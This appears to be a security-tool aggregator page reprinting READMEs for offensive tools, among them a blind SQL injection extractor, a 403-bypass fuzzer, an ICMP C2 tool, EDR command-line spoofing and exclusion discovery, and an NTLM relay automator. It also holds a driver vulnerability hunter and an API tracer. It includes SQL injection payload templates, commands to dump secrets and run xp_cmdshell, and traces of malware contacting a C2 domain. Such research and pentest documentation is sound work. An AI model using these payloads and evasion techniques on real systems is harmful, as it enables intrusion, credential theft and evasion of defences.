    Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

    Hakuin has been presented at esteemed academic and industrial conferences:

    β€’ BlackHat MEA, Riyadh, 2023
    β€’ Hack in the Box, Phuket, 2023
    β€’ IEEE S&P Workshop on Offensive Technologies (WOOT), 2023

    More information can be found in our paper and slides.


    Installation

    To install Hakuin, simply run:

    pip3 install hakuin

    Developers should install the package locally and set the -e flag for editable mode:

    git clone git@github.com:pruzko/hakuin.git
    cd hakuin
    pip3 install -e .

    Examples

    Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from Requester and override the request method. The method must also determine whether the query resolved to True or False.

    Example 1 - Query Parameter Injection with Status-based Inference

        import aiohttp
        from hakuin import Requester

        class StatusRequester(Requester):
            async def request(self, ctx, query):
                async with aiohttp.ClientSession() as session:
                    async with session.get(f'http://vuln.com/?n=XXX" OR ({query}) --') as r:
                        return r.status == 200

    Example 2 - Header Injection with Content-based Inference

        class ContentRequester(Requester):
            async def request(self, ctx, query):
                headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
                async with aiohttp.ClientSession() as session:
                    async with session.get('http://vuln.com/', headers=headers) as r:
                        return 'found' in await r.text()

    To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

    Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL

        import asyncio
        from hakuin import Extractor, Requester
        from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

        class StatusRequester(Requester):
            ...

        async def main():
            # requester: Use this Requester
            # dbms:      Use this DBMS
            # n_tasks:   Spawns N tasks that extract column rows in parallel
            ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
            ...

        if __name__ == '__main__':
            asyncio.get_event_loop().run_until_complete(main())

    Now that everything is set, you can start extracting DB metadata.

    Example 1 - Extracting DB Schemas
    # strategy:
    # 'binary': Use binary search
    # 'model': Use pre-trained model
    schema_names = await ext.extract_schema_names(strategy='model')
    Example 2 - Extracting Tables
    tables = await ext.extract_table_names(strategy='model')
    Example 3 - Extracting Columns
    columns = await ext.extract_column_names(table='users', strategy='model')
    Example 4 - Extracting Tables and Columns Together
    metadata = await ext.extract_meta(strategy='model')

    Once you know the structure, you can extract the actual content.

    Example 1 - Extracting Generic Columns

        # text_strategy: Use this strategy if the column is text
        res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')

    Example 2 - Extracting Textual Columns

        # strategy:
        #   'binary':   Use binary search
        #   'fivegram': Use five-gram model
        #   'unigram':  Use unigram model
        #   'dynamic':  Dynamically identify the best strategy. This setting
        #               also enables opportunistic guessing.
        res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')

    Example 3 - Extracting Integer Columns

        res = await ext.extract_column_int(table='users', column='id')

    Example 4 - Extracting Float Columns

        res = await ext.extract_column_float(table='products', column='price')

    Example 5 - Extracting Blob (Binary Data) Columns

        res = await ext.extract_column_blob(table='users', column='id')

    More examples can be found in the tests directory.

    Using Hakuin from the Command Line

    Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

    python3 hk.py -h

    For Researchers

    This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

    Cite Hakuin

    @inproceedings{hakuin_bsqli,
        title        = {Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
        author       = {Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
        booktitle    = {2023 IEEE Security and Privacy Workshops (SPW)},
        pages        = {384--393},
        year         = {2023},
        organization = {IEEE}
    }



    BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

    By: Zion3R β€” May 13th 2024 at 12:30


    The original 403fuzzer.py :)

    Fuzz 401/403ing endpoints for bypasses

    This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.
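The path-normalization side of those checks boils down to mutating the request path. A few illustrative variants (a small hand-picked sample, not BypassFuzzer's actual payload list):

```python
def path_bypass_payloads(path: str):
    """Generate a handful of common path-normalization bypass variants
    for a forbidden path (illustrative sample only)."""
    trimmed = path.rstrip("/")
    return [
        trimmed,             # as-is
        trimmed + "/",       # trailing slash
        trimmed + "/.",      # trailing dot segment
        trimmed + "//",      # doubled slash
        trimmed + "/..;/",   # Tomcat-style path parameter trick
        trimmed + "%2e/",    # URL-encoded dot
        trimmed.upper(),     # case variation
    ]
```

Each variant is then requested and its status code and length compared against the baseline 401/403 response.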

    It will output the response codes and length for each request in a nicely organized, color-coded way so things are readable.

    I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

    You can now feed it raw HTTP requests that you save to a file from Burp.

    Follow me on twitter! @intrudir


    Usage

    usage: bypassfuzzer.py -h

    Specifying a request to test

    Best method: Feed it a raw HTTP request from Burp!

    Simply paste the request into a file and run the script!

    β€’ It will parse and use cookies & headers from the request.
    β€’ Easiest way to authenticate for your requests.

    python3 bypassfuzzer.py -r request.txt

    Using other flags

    Specify a URL

    python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

    Specify cookies to use in requests:
    some examples:

    --cookies "cookie1=blah"
    -c "cookie1=blah; cookie2=blah"

    Specify a method/verb and body data to send

    bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
    bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

    Specify custom headers to use with every request. Maybe you need to add some kind of auth header like Authorization: bearer <token>

    Specify -H "header: value" for each additional header you'd like to add:

    bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

    Smart filter feature!

    Based on response code and length. If it sees a response 8 times or more it will automatically mute it.

    Repeats are changeable in the code until I add an option to specify it via a flag

    NOTE: Can't be used simultaneously with -hc or -hl (yet)

    # toggle smart filter on
    bypassfuzzer.py -u https://example.com/forbidden --smart
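The smart-filter idea can be sketched as a counter keyed on the (status code, length) pair (an illustrative reimplementation, not the tool's actual code):

```python
from collections import Counter

class SmartFilter:
    """Mute responses whose (status code, length) signature has already
    been seen `threshold` or more times."""
    def __init__(self, threshold: int = 8):
        self.threshold = threshold
        self.seen = Counter()

    def should_show(self, status_code: int, length: int) -> bool:
        sig = (status_code, length)
        self.seen[sig] += 1
        return self.seen[sig] < self.threshold
```

With the default threshold of 8, the first seven identical responses print and everything after is muted, which keeps the output focused on anomalies.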

    Specify a proxy to use

    Useful if you wanna proxy through Burp

    bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

    Skip sending header payloads or url payloads

    # skip sending headers payloads
    bypassfuzzer.py -u https://example.com/forbidden -sh
    bypassfuzzer.py -u https://example.com/forbidden --skip-headers

    # Skip sending path normalization payloads
    bypassfuzzer.py -u https://example.com/forbidden -su
    bypassfuzzer.py -u https://example.com/forbidden --skip-urls

    Hide response code/length

    Provide comma delimited lists without spaces. Examples:

    # Hide response codes
    bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

    # Hide response lengths of 638
    bypassfuzzer.py -u https://example.com/forbidden -hl 638

    TODO

    • [x] Automatically check other methods/verbs for bypass
    • [x] absolute domain attack
    • [ ] Add HTTP/2 support
    • [ ] Looking for ideas. Ping me on twitter! @intrudir



    PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

    By: Zion3R β€” May 12th 2024 at 12:30


    PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

    Features:

    • Uses ICMP for Command and Control
    • Undetectable by most AV/EDR solutions
    • Written in Go

    Installation:

    Download the binaries

    or build the binaries and you are ready to go:

    $ git clone https://github.com/Nemesis0U/PingRAT.git
    $ go build client.go
    $ go build server.go

    Usage:

    Server:

    ./server -h
    Usage of ./server:
    -d string
    Destination IP address
    -i string
    Listener (virtual) Network Interface (e.g. eth0)

    Client:

    ./client -h
    Usage of ./client:
    -d string
    Destination IP address
    -i string
    (Virtual) Network Interface (e.g., eth0)




    LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line

    By: Zion3R β€” May 11th 2024 at 12:30


    LOLSpoof is an interactive shell program that automatically spoofs the command line arguments of the spawned process. Just call your incriminating-looking LOLBin command line (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.


    Why

    Process command line is a very monitored telemetry, being thoroughly inspected by AV/EDRs, SOC analysts or threat hunters.

    How

    1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
    2. Spawns that suspended LOLBin with the spoofed command line
    3. Gets the remote PEB address
    4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
    5. Gets the address of the command line unicode buffer
    6. Overrides the fake command line with the real one
    7. Resumes the main thread
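Step 1 can be sketched as a small helper that keeps the executable name and pads the arguments with spaces of equal length, so the real arguments can later be written over the same buffer in-place (illustrative only; the actual overwrite in steps 3-6 happens via the remote PEB):

```python
def spoofed_cmdline(real_cmdline: str) -> str:
    """Build the decoy command line: same executable, arguments replaced
    by spaces of identical total length (lolbin.exe " " * sizeof(args))."""
    exe, _, args = real_cmdline.partition(" ")
    if not args:
        return exe
    return exe + " " + " " * len(args)
```

Keeping the lengths identical matters: the real arguments must fit exactly into the Unicode buffer that the spoofed command line allocated in the child's RTL_USER_PROCESS_PARAMETERS.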

    Opsec considerations

    Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry:

    1. Creation of a suspended process
    2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead)
    3. Write to the spawned process with WriteProcessMemory

    Build

    Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

    nimble install winim

    Known issue

    Programs that clear or change previously printed console messages (such as timeout.exe 10) break the program. When such commands are employed, you'll need to restart the console. I don't know how to fix that; open to suggestions.




    SQLMC - Check All Urls Of A Domain For SQL Injections

    By: Zion3R β€” May 10th 2024 at 12:30


    SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

    Features

    • Scans a domain for SQL injection vulnerabilities
    • Crawls the given URL up to a specified depth
    • Checks each link for SQL injection vulnerabilities
    • Reports vulnerabilities along with server information and depth

    Installation

    1. Install the required dependencies:

        pip3 install sqlmc

    Usage

    Run sqlmc with the following command-line arguments:

    • -u, --url: The URL to scan (required)
    • -d, --depth: The depth to scan (required)
    • -o, --output: The output file to save the results

    Example usage:

    sqlmc -u http://example.com -d 2

    Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

    The tool will then perform the scan and display the results.

    ToDo

    • Check for multiple GET params
    • Better injection checker trigger methods

    Credits

    License

    This project is licensed under the GNU Affero General Public License v3.0.




    BadExclusionsNWBO - An Evolution From BadExclusions To Identify Folder Custom Or Undocumented Exclusions On AV/EDR

    By: Zion3R β€” May 9th 2024 at 12:30


    BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.

    How does it work?

    BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe in the same folder as BadExclusionsNWBO.exe.

    Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or fewer, the folder has an exclusion; otherwise, the folder is not excluded.
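That decision rule can be sketched as a hypothetical helper around Hook_Checker's per-folder output, with the threshold of 7 taken from the text above:

```python
HOOK_THRESHOLD = 7  # 7 or fewer userland hooks suggests the folder is excluded

def excluded_folders(hook_counts: dict) -> list:
    """Given {folder: hook_count} results from Hook_Checker runs,
    return the folders whose low hook count suggests an AV/EDR exclusion."""
    return [folder for folder, hooks in hook_counts.items()
            if hooks <= HOOK_THRESHOLD]
```

The interesting output is therefore not the hook count itself but the delta: excluded folders stand out because the EDR skips hooking processes launched from them.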


    Original idea?

    Since the release of BadExclusions I've been thinking about how to achieve the same results without creating so much noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.

    If you download Probatorum-EDR-Userland-Hook-Checker and run it inside a regular folder and in a folder with a specific type of exclusion, you will notice a huge difference. All the information is in the Probatorum repository.

    Requirements

    Each vendor applies exclusions in a different way. In order to get the list of folder exclusions, a specific type of exclusion should be made. Not all types of exclusion, and not all vendors, remove the hooks when they exclude a folder.

    The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write the Hook_Checker file and get the results.

    EDR Demo

    https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4




    Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

    By: Zion3R β€” May 8th 2024 at 12:30

    Description

    Presented at CODE BLUE 2023, this project, titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis, introduces IOCTLance, a tool that enhances the capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknown ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


    Features

    Target Vulnerability Types

    • map physical memory
    • controllable process handle
    • buffer overflow
    • null pointer dereference
    • read/write controllable address
    • arbitrary shellcode execution
    • arbitrary wrmsr
    • arbitrary out
    • dangerous file operation

    Optional Customizations

    • length limit
    • loop bound
    • total timeout
    • IoControlCode timeout
    • recursion
    • symbolize data section

    Build

    Docker (Recommended)

    docker build .

    Local

    dpkg --add-architecture i386
    apt-get update
    apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
    openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
    libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
    libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
    libffi-dev libxslt1-dev libxml2-dev

    pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

    Analysis

    # python3 analysis/ioctlance.py -h
    usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
    [-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
    path

    positional arguments:
    path dir (including subdirectory) or file path to the driver(s) to analyze

    optional arguments:
    -h, --help show this help message and exit
    -i IOCTLCODE, --ioctlcode IOCTLCODE
    analyze specified IoControlCode (e.g. 22201c)
    -T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
    total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
    -t TIMEOUT, --timeout TIMEOUT
    timeout for analyze each IoControlCode (default 40, 0 to unlimited)
    -l LENGTH, --length LENGTH
    the limit of number of instructions for technique LengthLimiter (default 0, 0
    to unlimited)
    -b BOUND, --bound BOUND
    the bound for technique LoopSeer (default 0, 0 to unlimited)
    -g GLOBAL_VAR, --global_var GLOBAL_VAR
    symbolize how many bytes in .data section (default 0 hex)
    -a ADDRESS, --address ADDRESS
    address of ioctl handler to directly start hunting with blank state (e.g.
    140005c20)
    -e EXCLUDE, --exclude EXCLUDE
    exclude function address split with , (e.g. 140005c20,140006c20)
    -o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
    -r, --recursion do not kill state if detecting recursion (default False)
    -c, --complete get complete base state (default False)
    -d, --debug print debug info while analyzing (default False)
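    For repeated runs, the flags above can be assembled programmatically. The sketch below is a hypothetical convenience wrapper (not part of IOCTLance) that builds an analysis/ioctlance.py command line from a few of the documented options:

    ```python
    # Hypothetical helper: builds an ioctlance.py argv list from the documented flags.
    def build_ioctlance_cmd(path, ioctlcode=None, total_timeout=1200,
                            timeout=40, overwrite=False, debug=False):
        cmd = ["python3", "analysis/ioctlance.py"]
        if ioctlcode is not None:
            cmd += ["-i", ioctlcode]          # analyze one IoControlCode only
        cmd += ["-T", str(total_timeout)]     # whole-run timeout (0 = unlimited)
        cmd += ["-t", str(timeout)]           # per-IoControlCode timeout
        if overwrite:
            cmd.append("-o")                  # re-analyze even if x.sys.json exists
        if debug:
            cmd.append("-d")                  # print debug info while analyzing
        cmd.append(path)                      # driver file or directory, last
        return cmd

    print(build_ioctlance_cmd("drivers/x.sys", ioctlcode="22201c", overwrite=True))
    ```

    The returned list can be passed to subprocess.run, or joined into a shell command.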

    Evaluation

    # python3 evaluation/statistics.py -h
    usage: statistics.py [-h] [-w] path

    positional arguments:
    path target dir or file path

    optional arguments:
    -h, --help show this help message and exit
    -w, --wdm copy the wdm drivers into <path>/wdm

    Test

    1. Compile the testing examples in test to generate testing driver files.
    2. Run IOCTLance against the driver files.


    KitPloit - PenTest Tools!

    NTLM Relay Gat - Powerful Tool Designed To Automate The Exploitation Of NTLM Relays

    By: Zion3R β€” May 8th 2024 at 03:30


    NTLM Relay Gat is a powerful tool designed to automate the exploitation of NTLM relays using ntlmrelayx.py from the Impacket tool suite. By leveraging the capabilities of ntlmrelayx.py, NTLM Relay Gat streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.


    Features

    • Multi-threading Support: Utilize multiple threads to perform actions concurrently.
    • SMB Shares Enumeration: List available SMB shares.
    • SMB Shell Execution: Execute a shell via SMB.
    • Secrets Dumping: Dump secrets from the target.
    • MSSQL Database Enumeration: List available MSSQL databases.
    • MSSQL Command Execution: Execute operating system commands via xp_cmdshell or start SQL Server Agent jobs.

    Prerequisites

    Before you begin, ensure you have met the following requirements:

    • proxychains properly configured with ntlmrelayx SOCKS relay port
    • Python 3.6+

    Installation

    To install NTLM Relay Gat, follow these steps:

    1. Ensure that Python 3.6 or higher is installed on your system.

    2. Clone NTLM Relay Gat repository:

    git clone https://github.com/ad0nis/ntlm_relay_gat.git
    cd ntlm_relay_gat
    3. Install dependencies, if you don't have them installed already:
    pip install -r requirements.txt

    NTLM Relay Gat is now installed and ready to use.

    Usage

    To use NTLM Relay Gat, make sure you have relayed sessions listed in ntlmrelayx.py's socks command output and that proxychains is configured to use ntlmrelayx.py's SOCKS proxy, then execute the script with the desired options. Here are some examples of how to run NTLM Relay Gat:

    # List available SMB shares using 10 threads
    python ntlm_relay_gat.py --smb-shares -t 10

    # Execute a shell via SMB
    python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell

    # Dump secrets from the target
    python ntlm_relay_gat.py --dump-secrets

    # List available MSSQL databases
    python ntlm_relay_gat.py --mssql-dbs

    # Execute an operating system command via xp_cmdshell
    python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'

    Disclaimer

    NTLM Relay Gat is intended for educational and ethical penetration testing purposes only. Usage of NTLM Relay Gat for attacking targets without prior mutual consent is illegal. The developers of NTLM Relay Gat assume no liability and are not responsible for any misuse or damage caused by this tool.

    License

    This project is licensed under the MIT License - see the LICENSE file for details.



    KitPloit - PenTest Tools!

    Gftrace - A Command Line Windows API Tracing Tool For Golang Binaries

    By: Zion3R β€” May 6th 2024 at 12:30


    A command line Windows API tracing tool for Golang binaries.

    Note: This tool is a PoC and a work-in-progress prototype, so please treat it as such. Feedback is always welcome!


    How does it work?

    Although Golang programs contain a lot of nuances regarding the way they are built and their runtime behavior, they still need to interact with the OS layer, which means that at some point they call functions from the Windows API.

    The Go runtime package contains a function called asmstdcall, which acts as a kind of "gateway" used to interact with the Windows API. Since this function is expected to call Windows API functions, we can assume it needs access to information such as the address of the function and its parameters, and this is where things start to get more interesting.

    Asmstdcall receives a single parameter, which is a pointer to something similar to the following structure:

    struct LIBCALL {
        DWORD_PTR Addr;
        DWORD Argc;
        DWORD_PTR Argv;
        DWORD_PTR ReturnValue;

        [...]
    }
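    For experimentation, the layout above can be mirrored in Python with ctypes. This is an illustrative sketch only: field names follow the listing above, and the pointer width assumes the interpreter's native word size.

    ```python
    import ctypes

    # Illustrative mirror of the LIBCALL-like struct described above.
    # DWORD_PTR maps to a native-width pointer, DWORD to a 32-bit unsigned int.
    class LIBCALL(ctypes.Structure):
        _fields_ = [
            ("Addr",        ctypes.c_void_p),   # address of the API function to call
            ("Argc",        ctypes.c_uint32),   # number of arguments
            ("Argv",        ctypes.c_void_p),   # pointer to the argument list
            ("ReturnValue", ctypes.c_void_p),   # filled in after the call returns
        ]

    call = LIBCALL(Addr=0xdeadbeef, Argc=2)
    print(call.Argc)
    ```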

    Some of these fields are filled in after the API function is called, like the return value; others are received by asmstdcall, like the function address, the number of arguments, and the list of arguments. Regardless of when they are set, it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.

    gftrace leverages asmstdcall and the way it works to monitor specific fields of the struct mentioned above and log them for the user. The tool is capable of logging the function name, its parameters, and the return value of each Windows function called by a Golang application, all without hooking a single API function or needing a signature for any of them.

    The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).

    If you want to know more about this project and research check the blogpost.

    Installation

    Download the latest release.

    Usage

    1. Make sure gftrace.exe, gftrace.dll and gftrace.cfg are in the same directory.
    2. Specify which API functions you want to trace in the gftrace.cfg file (the tool does not work without API filters applied).
    3. Run gftrace.exe passing the target Golang program path as a parameter.
    gftrace.exe <filepath> <params>

    Configuration

    All you need to do is specify which functions you want to trace in the gftrace.cfg file, separated by commas with no spaces:

    CreateFileW,ReadFile,CreateProcessW
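    The filter format is simple enough to validate ahead of time. The following sketch (not part of gftrace) parses a config line into the list of function names that would be traced:

    ```python
    def parse_gftrace_cfg(line):
        """Split a gftrace.cfg filter line (comma-separated, no spaces) into names."""
        return [name for name in line.strip().split(",") if name]

    print(parse_gftrace_cfg("CreateFileW,ReadFile,CreateProcessW"))
    # ['CreateFileW', 'ReadFile', 'CreateProcessW']
    ```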

    The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined by analyzing the method itself or by guessing. There are some interesting characteristics that can help: for example, Golang applications seem to prefer functions from the "Wide" and "Ex" sets (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc.), so you can take that into account during your analysis.

    The default config file contains multiple functions which I have already tested (at least most of them) and can say for sure can be called by a Golang application at some point. I'll try to update it eventually.

    Examples

    Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:

    - CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
    - ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
    - CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
    - ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
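    Trace lines follow a regular shape ("- Name(args) = 0xRET (DEC)"), which makes them easy to post-process. A rough Python parser, assuming that format holds:

    ```python
    import re

    # Rough parser for gftrace-style output lines, assuming the shape:
    #   - FuncName(arg1, arg2, ...) = 0xRET (DEC)
    LINE = re.compile(r"^- (\w+)\((.*)\) = (0x[0-9a-fA-F]+) \((-?\d+)\)$")

    def parse_trace_line(line):
        m = LINE.match(line.strip())
        if not m:
            return None
        name, args, _ret_hex, ret_dec = m.groups()
        return {"func": name, "args": args, "ret": int(ret_dec)}

    rec = parse_trace_line('- ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)')
    print(rec["func"], rec["ret"])
    ```

    This could be used, for example, to filter a capture down to failed calls (negative return values).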

    Tracing CreateProcessW() in the TunnelFish malware:

    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress |  ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)

    [...]

    Tracing multiple functions in the Sunshuttle malware:

    - CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
    - CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
    - CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
    - WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
    - GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
    - WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
    - WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
    - GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
    - WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
    - WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)

    [...]

    Tracing multiple functions in the DeimosC2 framework agent:

    - WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
    - setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
    - socket(0x2, 0x1, 0x6) = 0x138 (312)
    - WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
    - GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
    - GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
    - LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
    - NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
    - GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
    - GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
    - CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
    - GetCurrentProcessId() = 0x2584 (9604)
    - GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57)

    [...]

    Future features:

    • [x] Support inspection of 32 bits files.
    • [x] Add support to files calling functions via the "IAT jmp table" instead of the API call directly in asmstdcall.
    • [x] Add support to cmdline parameters for the target process
    • [ ] Send the tracing log output to a file by default to make it better to filter. Currently there's no separation between the target file and gftrace output. An alternative is redirect gftrace output to a file using the command line.

    :warning: Warning

